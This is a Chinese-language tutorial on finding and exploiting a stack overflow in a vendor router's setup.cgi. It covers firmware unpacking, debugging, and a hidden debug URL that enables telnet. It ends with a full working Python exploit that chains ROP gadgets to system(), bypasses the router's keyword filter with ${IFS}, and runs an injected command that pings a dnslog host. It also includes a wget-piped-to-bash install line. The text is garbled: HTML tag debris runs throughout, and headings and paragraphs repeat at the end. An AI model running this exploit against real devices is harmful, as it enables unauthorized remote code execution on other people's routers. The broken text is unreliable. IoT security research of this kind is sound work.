从零开始的路由器漏洞挖掘实战教程<\/h1>

前言<\/h2>
本教程将详细介绍如何从零开始挖掘某厂商路由器的漏洞，涵盖固件分析、动态调试和漏洞利用的全过程。教程针对MIPSEL架构的路由器，通过实际操作演示漏洞挖掘的完整流程，特别适合新手入门学习。<\/p>

环境准备<\/h2>

1. 固件分析工具安装<\/h3>

Binwalk安装<\/h4>

Binwalk是一个强大的固件分析工具，用于提取和分析嵌入式固件镜像：<\/p>

git clone https:\/\/github.com\/ReFirmLabs\/binwalk
<\/span><\/span>cd binwalk
<\/span><\/span>sudo python3 setup.py install
<\/span><\/span>sudo .\/deps.sh  # Ubuntu系统专用依赖安装脚本<\/span>
<\/span><\/span><\/code><\/pre>2. 交叉编译环境配置<\/h3>
为了调试MIPSEL架构的二进制文件，需要配置交叉编译环境：<\/p>
sudo apt-get install linux-libc-dev-mipsel-cross
<\/span><\/span>sudo apt-get install libc6-mipsel-cross libc6-dev-mipsel-cross
<\/span><\/span>sudo apt-get install binutils-mipsel-linux-gnu gcc-mipsel-linux-gnu
<\/span><\/span>sudo apt-get install g++-mipsel-linux-gnu
<\/span><\/span><\/code><\/pre>3. 调试工具准备<\/h3>
gdbserver编译<\/h4>
下载并编译适用于MIPSEL架构的gdbserver：<\/p>
wget https:\/\/ftp.gnu.org\/gnu\/gdb\/gdb-10.1.tar.xz
<\/span><\/span>tar xvf gdb-10.1.tar.xz
<\/span><\/span>cd gdb-10.1
<\/span><\/span>CC=<\/span>"mips-linux-gnu-gcc -EL"<\/span> CXX=<\/span>"mips-linux-gnu-g++"<\/span> .\/configure --target=<\/span>mips-linux-gnu --host=<\/span>"mips-linux-gnu"<\/span> --prefix=<\/span>"\/root\/tgdb"<\/span> LDFLAGS=<\/span>"-static"<\/span>
<\/span><\/span>make -j7
<\/span><\/span><\/code><\/pre>如果编译失败，可以直接下载预编译版本：

https:\/\/github.com\/stayliv3\/gdb-static-cross\/tree\/master\/prebuilt<\/a><\/p>
调试客户端配置<\/h4>
在调试主机上安装必要的工具：<\/p>
sudo apt install gdb-multiarch
<\/span><\/span># 安装gef插件<\/span>
<\/span><\/span>bash -c "<\/span>$(<\/span>wget http:\/\/gef.blah.cat\/sh -O -)<\/span>"<\/span>
<\/span><\/span><\/code><\/pre>固件分析<\/h2>
1. 固件解包<\/h3>
从厂商官网下载固件后，使用binwalk进行解包：<\/p>
binwalk -Me <firmware_file>
<\/span><\/span><\/code><\/pre>2. 漏洞定位<\/h3>
分析目标二进制文件（本例为setup.cgi）：<\/p>
file setup.cgi
<\/span><\/span># 输出: ELF 32-bit LSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-uClibc.so.0, stripped<\/span>
<\/span><\/span><\/code><\/pre>通过逆向分析发现：<\/p>

主函数位于setup_main<\/code><\/li>
函数sub_555BA950<\/code>从nvram获取环境变量fw_out_rules<\/code>的值<\/li>
未进行长度检查，在sscanf<\/code>格式化写入时导致栈溢出<\/li>
<\/ul>
3. 漏洞触发路径分析<\/h3>
通过交叉引用发现：<\/p>

fw_out_rules<\/code>在sub_55567D8C<\/code>被设置<\/li>
两个函数都通过ActionTab<\/code>方式按名调用<\/li>
对应调用名称为rule_list_simple_out<\/code>和outmove<\/code><\/li>
<\/ul>
在固件解包目录下搜索相关字符串：<\/p>
grep -r "rule_list_simple_out"<\/span>
<\/span><\/span>grep -r "outmove"<\/span>
<\/span><\/span><\/code><\/pre>动态调试<\/h2>
1. 开启路由器调试功能<\/h3>
通过逆向发现可以通过以下方式开启telnet：<\/p>
http:\/\/192.168.1.1\/setup.cgi?todo=debug
telnet 192.168.1.1
<\/code><\/pre>
2. 上传gdbserver<\/h3>
在路由器上启动HTTP服务：<\/p>
python -m http.server 9999<\/span>
<\/span><\/span><\/code><\/pre>在路由器上下载gdbserver：<\/p>
wget http:\/\/192.168.1.2:9999\/gdbserver -O \/tmp\/gdbserver
<\/span><\/span>chmod +x \/tmp\/gdbserver
<\/span><\/span><\/code><\/pre>3. 附加进程调试<\/h3>
由于setup.cgi不是持久进程，使用以下脚本循环附加：<\/p>
int=<\/span>1<\/span>
<\/span><\/span>while<\/span> [<\/span> $int -le 1000<\/span> ]<\/span>; do<\/span>
<\/span><\/span>    \/tmp\/gdbserver 0.0.0.0:12345 --attach `<\/span>ps -A | grep setup.cgi | awk '{print $1}'<\/span> | head -n 1`<\/span>
<\/span><\/span>done<\/span>
<\/span><\/span><\/code><\/pre>4. 调试端配置<\/h3>
创建gdb.cmd文件：<\/p>
set arch mips
set endian little
gef-remote 192.168.1.1:12345
b *0x555BAC2C
<\/code><\/pre>
启动调试：<\/p>
gdb-multiarch setup.cgi -x .\/gdb.cmd
<\/span><\/span><\/code><\/pre>注意：IDA反汇编的基址可能与实际不同，需要根据实际基址进行rebase。<\/p>
漏洞利用<\/h2>
1. 漏洞原理<\/h3>
MIPS架构下：<\/p>

函数调用时将返回地址放在$ra<\/code>寄存器<\/li>
函数起始处压栈，结束时弹出<\/li>
通过ja<\/code>指令跳到返回地址<\/li>
需要溢出到var_s24<\/code>来劫持控制流<\/li>
<\/ul>
2. 寻找gadget<\/h3>
使用ropper查找合适的gadget：<\/p>
file setup.cgi
<\/span><\/span>search addiu $a0
<\/span><\/span><\/code><\/pre>找到的关键gadget：<\/p>
0x55592ce4: addiu $a0, $a0, -0x60; lw $ra, 0x1c($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
0x55567650: la $t9, system; nop; jalr $t9; nop;
<\/code><\/pre>
3. 构造payload<\/h3>
利用cyclic工具确定偏移量：<\/p>
cyclic -l <pattern>
<\/span><\/span><\/code><\/pre>4. 绕过过滤<\/h3>
目标路由器在FindForbidValue<\/code>函数中检查了敏感字符\/关键字，需要避免使用这些字符。<\/p>
5. 最终exp<\/h3>
import<\/span> requests,<\/span> re
<\/span><\/span>import<\/span> base64
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/192.168.1.1\/"<\/span>
<\/span><\/span>user =<\/span> "aaaa"<\/span>
<\/span><\/span>pwd =<\/span> "xxxx!"<\/span>
<\/span><\/span>command =<\/span> '\/bin\/ping xxx.dnslog.cn -c 4'<\/span>
<\/span><\/span>command =<\/span> command.<\/span>replace(" "<\/span>, "$<\/span>{IFS}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>auth =<\/span> "Basic "<\/span> +<\/span> base64.<\/span>b64encode((user +<\/span> ":"<\/span> +<\/span> pwd).<\/span>encode()).<\/span>decode("utf-8"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> login<\/span>():
<\/span><\/span>    get_sessionid =<\/span> requests.<\/span>get(url)
<\/span><\/span>    sessionid =<\/span> get_sessionid.<\/span>headers["Set-Cookie"<\/span>]
<\/span><\/span>    headers =<\/span> {"Authorization"<\/span>: auth, "Cookie"<\/span>: sessionid}
<\/span><\/span>    r =<\/span> requests.<\/span>get(url, headers=<\/span>headers)
<\/span><\/span>    if<\/span> r.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>        print("[+] Login success!"<\/span>)
<\/span><\/span>        return<\/span> sessionid
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print("[-] Login failed!"<\/span>)
<\/span><\/span>        exit(0<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> get_sid<\/span>(sessionid):
<\/span><\/span>    headers =<\/span> {"Authorization"<\/span>: auth, "Cookie"<\/span>: sessionid}
<\/span><\/span>    get_sid =<\/span> requests.<\/span>get(url +<\/span> "fw_rules.htm"<\/span>, headers=<\/span>headers)
<\/span><\/span>    sid =<\/span> re.<\/span>findall(r<\/span>'\?id=[a-f0-9]+'<\/span>, get_sid.<\/span>content.<\/span>decode("utf-8"<\/span>))
<\/span><\/span>    return<\/span> sid[0<\/span>]
<\/span><\/span>
<\/span><\/span>def<\/span> attack<\/span>(sessionid):
<\/span><\/span>    attackurl =<\/span> url +<\/span> "setup.cgi"<\/span> +<\/span> get_sid(sessionid)
<\/span><\/span>    payload =<\/span> "a"<\/span> *<\/span> 376<\/span>
<\/span><\/span>    payload +=<\/span> "<\/span>%e<\/span>4<\/span>%2c%59%<\/span>55"<\/span>  # ra = 0x55592ce4: addiu $a0, $a0, -0x60; lw $ra, 0x1c($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;<\/span>
<\/span><\/span>    payload +=<\/span> "b"<\/span> *<\/span> 0x1c<\/span>
<\/span><\/span>    payload +=<\/span> "<\/span>%50%<\/span>76<\/span>%56%<\/span>55"<\/span>  # ra = 0x55567650: la $t9, system; nop; jalr $t9; nop;<\/span>
<\/span><\/span>    payload +=<\/span> "c"<\/span> *<\/span> 8<\/span>
<\/span><\/span>    payload +=<\/span> "<\/span>%0a{}%0a<\/span>"<\/span>.<\/span>format(command)
<\/span><\/span>    
<\/span><\/span>    pad =<\/span> 500<\/span> -<\/span> (len(payload) -<\/span> 4<\/span>)
<\/span><\/span>    if<\/span> (pad >=<\/span> 0<\/span>):
<\/span><\/span>        payload +=<\/span> "c"<\/span> *<\/span> pad  # pad len to 500<\/span>
<\/span><\/span>    
<\/span><\/span>    print("[+] Attack start"<\/span>)
<\/span><\/span>    print(attackurl, payload)
<\/span><\/span>    
<\/span><\/span>    data =<\/span> "save=Apply&service_list="<\/span> +<\/span> payload +<\/span> "&fwout_action=0&fwout_laniptype=anyip&fwout_waniptype=anyip&fwout_logging=1&h_fwout_action=0&h_fwout_laniptype=anyip&h_fwout_waniptype=anyip&h_fwout_logging=1&h_service_list=AIM&c4_lan_start_ip=192.168.1.NaN&c4_lan_finish_ip=192.168.1.NaN&c4_wan_start_ip=&c4_wan_finish_ip=&h_ruleSelect=0&edit=0&todo=save&this_file=rule_out.htm&next_file=BKS_service_add.htm&SID="<\/span>
<\/span><\/span>    headers =<\/span> {"Cookie"<\/span>: sessionid, "Authorization"<\/span>: auth}
<\/span><\/span>    r =<\/span> requests.<\/span>post(url=<\/span>attackurl, data=<\/span>data, headers=<\/span>headers)
<\/span><\/span>    
<\/span><\/span>    if<\/span> r.<\/span>status_code:
<\/span><\/span>        print("[+] Attack success!, the result is:"<\/span>)
<\/span><\/span>        print(r.<\/span>content)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print("[-] Attack failed!"<\/span>)
<\/span><\/span>        exit(0<\/span>)
<\/span><\/span>
<\/span><\/span>sessionid =<\/span> login()
<\/span><\/span>attack(sessionid)
<\/span><\/span><\/code><\/pre>参考资源<\/h2>

TP-Link WR841N 栈溢出漏洞(CVE-2020-8423)分析<\/a><\/li>
思科路由器 RV110W CVE-2020-3331 漏洞复现<\/a><\/li>
<\/ol>
总结<\/h2>
本教程详细介绍了路由器漏洞挖掘的全过程，从环境配置到漏洞利用。关键点包括：<\/p>

固件提取与分析<\/li>
逆向工程与漏洞定位<\/li>
动态调试环境搭建<\/li>
MIPS架构下的漏洞利用技巧<\/li>
实际漏洞利用代码编写<\/li>
<\/ol>
通过本教程，读者可以掌握路由器漏洞挖掘的基本方法和流程，为进一步的IoT安全研究打下基础。<\/p>

从零开始的路由器漏洞挖掘实战教程<\/h1>

前言<\/h2> 本教程将详细介绍如何从零开始挖掘某厂商路由器的漏洞，涵盖固件分析、动态调试和漏洞利用的全过程。教程针对MIPSEL架构的路由器，通过实际操作演示漏洞挖掘的完整流程，特别适合新手入门学习。<\/p>

环境准备<\/h2>

1. 固件分析工具安装<\/h3>

3. 调试工具准备<\/h3>

固件分析<\/h2>

1. 固件解包<\/h3> 从厂商官网下载固件后，使用binwalk进行解包：<\/p>

2. 漏洞定位<\/h3> 分析目标二进制文件（本例为setup.cgi）：<\/p>

动态调试<\/h2>

漏洞利用<\/h2>

4. 绕过过滤<\/h3> 目标路由器在FindForbidValue<\/code>函数中检查了敏感字符\/关键字，需要避免使用这些字符。<\/p>

前言<\/h2>
本教程将详细介绍如何从零开始挖掘某厂商路由器的漏洞，涵盖固件分析、动态调试和漏洞利用的全过程。教程针对MIPSEL架构的路由器，通过实际操作演示漏洞挖掘的完整流程，特别适合新手入门学习。<\/p>

4. 绕过过滤<\/h3>
目标路由器在`FindForbidValue<\/code>函数中检查了敏感字符\/关键字，需要避免使用这些字符。<\/p>`